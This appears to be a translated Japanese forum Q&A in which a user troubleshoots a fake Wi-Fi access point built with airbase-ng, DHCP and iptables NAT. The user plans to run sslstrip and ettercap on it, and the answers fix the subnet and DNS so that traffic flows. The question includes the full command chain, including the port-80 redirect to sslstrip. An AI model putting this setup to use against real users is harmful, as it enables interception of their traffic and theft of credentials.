テスト目的で偽の AP を設定しようとしています。airbase-ngクライアントが IP アドレスを取得できるように DHCP サーバーをセットアップして、正常に動作させることができました。私のラップトップには、AP 用の外部 Wi-Fi カードとインターネット用の内蔵 Wi-Fi カードがあります。ただし、AP を起動すると、クライアント (私の電話) は Web ブラウザー検索を実行できず、ラップトップも実行できません。ラップトップにはモニター モードではない 2 つ目の Wi-Fi カードがあるにもかかわらずです。
私の設定は次のとおりです:
sudo ifconfig wlan1 down
sudo ifconfig wlan1 up
sudo airbase-ng -c 11 -e ANET wlan1
sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0
sudo ifconfig at0 mtu 1800
sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
sudo iptables -P FORWARD ACCEPT
sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sudo /etc/init.d/isc-dhcp-server start
ip_forwardingが有効になっています。
これはチュートリアルからのものです。次に、sslstrip と ettercap を実行します。
これは私のDHCPサブネット構成です
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0{
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "ANET";
option domain-name-servers 192.168.1.170;
range 192.168.1.2 192.168.1.40;
}
dhcpd コマンドは次のように応答します:
Multiple interfaces match the same subnet: wlan0 wlan1
Multiple interfaces match the same shared network: wlan0 wlan1
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
Multiple interfaces match the same subnet: wlan0 wlan1
Multiple interfaces match the same shared network: wlan0 wlan1
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
ettercap はクライアントからの DHCP 要求と ack を表示します。
DHCP: [192.168.1.1] OFFER : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [192.168.1.1] OFFER : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [C0:BD:D1:15:2B:64] REQUEST 192.168.1.2
DHCP: [192.168.1.1] ACK : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [192.168.1.1] ACK : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
wlan0 の IP アドレスは 192.168.1.170 です。
編集:
DHCP 設定:
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.2.0 netmask 255.255.255.0{
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "ANET";
option domain-name-servers 192.168.1.170;
range 192.168.2.2 192.168.2.40;
}
Iptables:
sudo ifconfig at0 192.168.2.1 netmask 255.255.255.0
sudo ifconfig at0 mtu 1800
sudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
sudo iptables -P FORWARD ACCEPT
sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sudo /etc/init.d/isc-dhcp-server start
sudo sslstrip -f -p -k 10000
答え1
これまでに 2 つの問題を文書化しました。
ラップトップの両側に同じ IP サブネットがあります。ラップトップは NAT ゲートウェイとして機能しており、これは IP ルーターの強化版のようなものです。IP ルーターは両側に異なるサブネットを持っている必要があります。そうでないと、ルーティング方法がわかりません。
DHCP サーバーを設定して、softAP のクライアントにラップトップを DNS サーバーとして使用するように指示しましたが、ラップトップは DNS サーバーまたはプロキシとして機能するように設定されていません。
この問題を解決するには、softAP クライアントのサブネットを 192.168.2.0/24 に変更しますが、DHCP サーバー プロセスはクライアントに 192.168.1.1 を DNS サーバーとして使用するように指示し続けます。こうすることで、クライアントの DNS 要求はラップトップの NAT を経由して上流の NAT ゲートウェイに送られます。このゲートウェイでは、おそらく DNS プロキシ サービスが実行されています。
答え2
これを修正するために、私はSpiffの回答に従い、最終的にうまく機能するようにいくつかの他のことを試しました。
1) Spiff の指示に従って、DHCP 構成ファイル内の IP サブネットを 192.168.2.0/24 に変更しました。
2) iptablesとoption routersDHCP設定ファイルでゲートウェイを192.168.2.1に設定しました。
3) 最後の部分: DHCP 構成ファイルで DNS を Google の 8.8.8.8 に変更しました。AP が DNS として使用する機能をブロックしていた可能性があります...推測にすぎません